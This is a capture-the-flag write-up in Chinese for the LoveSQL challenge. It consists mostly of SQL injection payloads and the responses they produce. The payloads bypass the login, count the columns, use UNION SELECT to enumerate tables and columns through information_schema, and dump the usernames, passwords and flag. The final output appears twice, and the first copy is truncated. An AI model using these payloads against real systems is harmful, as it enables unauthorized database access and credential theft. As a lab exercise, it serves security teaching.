极客大挑战_2019 LoveSQL

[极客大挑战 2019]LoveSQL

尝试万能密码登录

Hello admin！Your password is '1eb26772fe42a42d3ef6a247e970d1ee'

payload
check.php?username=admin' or '1'='1&password=2
//登录成功，并没有什么东西

加'报错，经排查，没有过滤限制，直接注入

check.php?username=admin' order by 4 %23&password=2
Unknown column '4' in 'order clause'

check.php?username=admin' order by 3 %23&password=2
Login Success!

check.php?username=' union select 1,2,3 %23&password=2
Hello 2！
Your password is '3'//两个回显点

check.php?username=' union select 1,version(),database() %23&password=2
Hello 10.3.18-MariaDB！
Your password is 'geek'

check.php?username=' union select 1,2,(select table_name from information_schema.tables where table_schema=database() limit 0,1)%23&password=2
Hello 2！
Your password is 'geekuser'

check.php?username=' union select 1,2,(select table_name from information_schema.tables where table_schema=database() limit 1,2)%23&password=2
Hello 2！

Your password is 'l0ve1ysq1'

check.php?username=' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())%23&password=2
Hello 2！
Your password is 'geekuser,l0ve1ysq1'//一步到位

check.php?username=' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1')%23&password=2
Hello 2！
Your password is 'id,username,password'

check.php?username=' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='geekuser')%23&password=2
Hello 2！

Your password is 'id,username,password'

check.php?username=' union select 1,2,(select group_concat(concat_ws(0x7e,username,password)) from l0ve1ysq1)%23&password=2
Hello 2！
Your password is 'cl4y~wo_tai_nan_le,glzjin~glzjin_wants_a_girlfriend,Z4cHAr7zCr~biao_ge_dddd_hm,0xC4m3l~linux_chuang_shi_ren,Ayrain~a_rua_rain,Akko~yan_shi_fu_de_mao_bo_he,fouc5~cl4y,fouc5~di_2_kuai_fu_ji,fouc5~di_3_kuai_fu_ji,fouc5~di_4_kuai_fu_ji,fouc5~di_5_kuai_fu_ji,fouc5~di_6_kuai_fu_ji,fouc5~di_7_kuai_fu_ji,fouc5~di_8_kuai_fu_ji,leixiao~Syc_san_da_hacker,flag~Hello 2！

Your password is 'cl4y~wo_tai_nan_le,glzjin~glzjin_wants_a_girlfriend,Z4cHAr7zCr~biao_ge_dddd_hm,0xC4m3l~linux_chuang_shi_ren,Ayrain~a_rua_rain,Akko~yan_shi_fu_de_mao_bo_he,fouc5~cl4y,fouc5~di_2_kuai_fu_ji,fouc5~di_3_kuai_fu_ji,fouc5~di_4_kuai_fu_ji,fouc5~di_5_kuai_fu_ji,fouc5~di_6_kuai_fu_ji,fouc5~di_7_kuai_fu_ji,fouc5~di_8_kuai_fu_ji,leixiao~Syc_san_da_hacker,flag~flag{b68743d7-102c-415c-82f9-447bff55b3f6}''